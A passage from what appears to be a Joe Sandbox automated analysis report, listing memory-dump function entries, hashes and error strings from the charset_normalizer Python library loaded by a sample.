                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: __init__$charset_normalizer.md.ArabicIsolatedFormPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-1141011871
                                                                                                                                                                                                                                                                                                  • Opcode ID: b59ea239b0ded2da1d7d86f123c67e001364e70b8c495ebd1fe9a254676c74a7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2015ce9a1c29e454fa22f0628b6de9f85e5bf70c70aef239e62c7b5401ad60f4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b59ea239b0ded2da1d7d86f123c67e001364e70b8c495ebd1fe9a254676c74a7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21314DB1A4AA0281EB428F7DEC102A5A3B0FB48B88F589535DE6C47775EF3DE551C740
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: __init__$charset_normalizer.md.UnprintablePlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-116036081
                                                                                                                                                                                                                                                                                                  • Opcode ID: 571f9f9e96768ffb2ac53c4efc93ddbf52cbfab833ec0306282c52c0bf4d27d3
                                                                                                                                                                                                                                                                                                  • Instruction ID: bfed46302419de923e15943bed942e1b4910bb0decb2698f54669f04d6dab7a7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 571f9f9e96768ffb2ac53c4efc93ddbf52cbfab833ec0306282c52c0bf4d27d3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B83127B1A0AA4281EB42CB6DE8503A9B3B0FB48B88F549436CE6C47775EF3DE555C340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: __init__$charset_normalizer.md.CjkInvalidStopPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-2610960353
                                                                                                                                                                                                                                                                                                  • Opcode ID: 76a7a677629842859978aaa54d4c908ac2703a6c097ce1729baa8608753adc48
                                                                                                                                                                                                                                                                                                  • Instruction ID: fb49e1872bab07ff84529b9031d5e45e1a434e9f9f652dc4c4adec04faf58ccf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76a7a677629842859978aaa54d4c908ac2703a6c097ce1729baa8608753adc48
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86314BB2A4AA0281EB42CB7DEC102A9A3B0FB48B88F549435CE6C47775EF3DE551C340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_String
                                                                                                                                                                                                                                                                                                  • String ID: __init__$charset_normalizer.md.TooManyAccentuatedPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                                                                                                  • API String ID: 1450464846-2999409259
                                                                                                                                                                                                                                                                                                  • Opcode ID: 46a8908cafe4df30933cc1bf2f0944172b9d1b0b9ac90932bbe1890628880787
                                                                                                                                                                                                                                                                                                  • Instruction ID: 37d27e623766c9aa9482e709b2b08e7f004ace71ef7fbc4b885f6a3a935c698f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46a8908cafe4df30933cc1bf2f0944172b9d1b0b9ac90932bbe1890628880787
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE3148B1A0AA0281EB42CF29E8102A9B3B1FB48B88F449435DE6C47775EF3DE451C340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: SubtypeType_
                                                                                                                                                                                                                                                                                                  • String ID: charset_normalizer.md.MessDetectorPlugin$eligible$str
                                                                                                                                                                                                                                                                                                  • API String ID: 2891779845-1291782451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7f0862f8ed2a2bf7f8ea4440bfcb9bd23f6d9e60511077b2f04859b75fbf1be2
                                                                                                                                                                                                                                                                                                  • Instruction ID: fbcb1b082bc92d9450e03a3cdd9817c88f6e9a45c967195e7ee822110e3e893d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f0862f8ed2a2bf7f8ea4440bfcb9bd23f6d9e60511077b2f04859b75fbf1be2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F118EE1B4A64681EA469B6DDC612B5E370BF45BC0F98E039CD2D4B3B0DE2CE855C340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuspiciousRange' object attribute '_last_printable_seen' cannot be deleted$str or None
                                                                                                                                                                                                                                                                                                  • API String ID: 1259552197-1971554219
                                                                                                                                                                                                                                                                                                  • Opcode ID: a918d477a285616c2c2e4df8314c3c17314b771cecf0fb593c970a7c657b72bd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 106d5b9999c9411ae3939e21bbf0c163c96c929aea553234d7ab8d868d1c6cae
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a918d477a285616c2c2e4df8314c3c17314b771cecf0fb593c970a7c657b72bd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB1145B1B0654685EE568B6DE890278B3B0FF48B94F48E135DF2D477A5DE3CD4548700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_String
                                                                                                                                                                                                                                                                                                  • String ID: 'ArchaicUpperLowerPlugin' object attribute '_last_alpha_seen' cannot be deleted$str or None
                                                                                                                                                                                                                                                                                                  • API String ID: 1259552197-1607602726
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2eb1423d3a8d026875b47d3e487d8fbdb754b2b35a34fb420c45883b89527626
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d04fc948c6cf15f4c9cb6fa43539e87533960e76d491fd644461a4bdc927ffd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2eb1423d3a8d026875b47d3e487d8fbdb754b2b35a34fb420c45883b89527626
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE1175B2B1660686EF568B6DE850278F770FB48B94F48E135DE2D477A5DE3CE4508700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_last_latin_character' cannot be deleted$str or None
                                                                                                                                                                                                                                                                                                  • API String ID: 1259552197-4111674009
                                                                                                                                                                                                                                                                                                  • Opcode ID: 45422d08dff3ba37862566774811d1c873494940e91693ae83718888786eb3b7
                                                                                                                                                                                                                                                                                                  • Instruction ID: e7052e919009075263f35380ac765cdb906bd0928bb74a5bf326f76672ec1309
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45422d08dff3ba37862566774811d1c873494940e91693ae83718888786eb3b7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D31175B2B0660585EF568F6DE850278A374FF48B94F48E135DE2D477A5DE3CE4548700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_String
                                                                                                                                                                                                                                                                                                  • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_last_printable_char' cannot be deleted$str or None
                                                                                                                                                                                                                                                                                                  • API String ID: 1259552197-2331204894
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4a2e56e4c18d021721d1ff58624d4138fa5cae7aafe6a9259ab8a3639d0b6b2d
                                                                                                                                                                                                                                                                                                  • Instruction ID: fcacc6958f3372fd17100c555b039192f006100bdd42479e1faea8631f7760c1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a2e56e4c18d021721d1ff58624d4138fa5cae7aafe6a9259ab8a3639d0b6b2d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A01151B2B0660586EE46DB6DE950368B370FB84B94F48A135DE2D47764EE2CD4508700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: SubtypeType_
                                                                                                                                                                                                                                                                                                  • String ID: charset_normalizer.md.MessDetectorPlugin$feed$str
                                                                                                                                                                                                                                                                                                  • API String ID: 2891779845-1310269896
                                                                                                                                                                                                                                                                                                  • Opcode ID: 174ffd5a8d4fbd5a7ace33c46627c3910e0e1c50ab3d8efb39f58c9a0e45e4fb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9eedaa2da2bc11ebd2a0217a69e9aa7b3fc09c74bac6fc8a08025c4fc5d9ad1d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 174ffd5a8d4fbd5a7ace33c46627c3910e0e1c50ab3d8efb39f58c9a0e45e4fb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3113AE1A5A60681EE16AB7AEC512B5E3B0BF85B80F94A039DD2D473F4DE2CE441C300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_String
                                                                                                                                                                                                                                                                                                  • String ID: 'SuperWeirdWordPlugin' object attribute '_buffer' cannot be deleted$str
                                                                                                                                                                                                                                                                                                  • API String ID: 1259552197-1393815803
                                                                                                                                                                                                                                                                                                  • Opcode ID: e3b12353829d0deeeabf54bb8e44c1ef7eec8a574ceacd3afffb07c93fd7f85b
                                                                                                                                                                                                                                                                                                  • Instruction ID: c38f01fec3cb705276224ef4c03e4f41359e388a81758ce82d433a5f9affcd1b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b12353829d0deeeabf54bb8e44c1ef7eec8a574ceacd3afffb07c93fd7f85b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71118CB2A0A54286EF56CF7DE8902B8F3B0FB44B84F08E031DE2D46665DE2CD490C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_FormatMethodObject_Vectorcall
                                                                                                                                                                                                                                                                                                  • String ID: bool$eligible
                                                                                                                                                                                                                                                                                                  • API String ID: 2503426208-3320767611
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6ffd60cce85a421e8434590f2d4fc69a980ada6fd10450d1b70e0e88f2682bec
                                                                                                                                                                                                                                                                                                  • Instruction ID: e642cb99e23cba58113737a51a6a2f709b50449ec6b60f6eea9ef1884bebb2ea
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ffd60cce85a421e8434590f2d4fc69a980ada6fd10450d1b70e0e88f2682bec
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A114CA1E5AA4280EF568B7DEC503B5E3B0EF48B84F88B039DD2D066B5DE2CD4808700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_FormatMethodObject_Vectorcall
                                                                                                                                                                                                                                                                                                  • String ID: bool$eligible
                                                                                                                                                                                                                                                                                                  • API String ID: 2503426208-3320767611
                                                                                                                                                                                                                                                                                                  • Opcode ID: c5b4b4656a59a8e67beff081790a41d695e4145e237a7eb8b31be5e0c87158af
                                                                                                                                                                                                                                                                                                  • Instruction ID: c9cf267bf1600303c452f55760096bb9a291dd94d0d7507837040f1fe1e09690
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5b4b4656a59a8e67beff081790a41d695e4145e237a7eb8b31be5e0c87158af
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7113AB1E5AA4281FF568B79EC513A5A2B0EF44B84F58B039DE2D066B5DE2CE4808700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DeallocErr_FormatMethodObject_Vectorcall
                                                                                                                                                                                                                                                                                                  • String ID: bool$eligible
                                                                                                                                                                                                                                                                                                  • API String ID: 2503426208-3320767611
                                                                                                                                                                                                                                                                                                  • Opcode ID: 45e89110cdaede4183728df16b150787876237ae891cae742361569b5cc7dc65
                                                                                                                                                                                                                                                                                                  • Instruction ID: 41da34e2a872400f22ab5c436914e7f7345e057ffe42cdac6d946cc3367d6908
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45e89110cdaede4183728df16b150787876237ae891cae742361569b5cc7dc65
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B111FA1A5AA4281EF568BB9EC517B5A3B0EF44784F58B039DE6D066B5DE2CD480C700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PyErr_SetString.PYTHON312(?,?,?,?,?,00007FFBAA461EDC), ref: 00007FFBAA463B35
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAA461FD0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA462008
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FFBAA461FD0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA462026
                                                                                                                                                                                                                                                                                                  • PyErr_Format.PYTHON312 ref: 00007FFBAA461F53
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
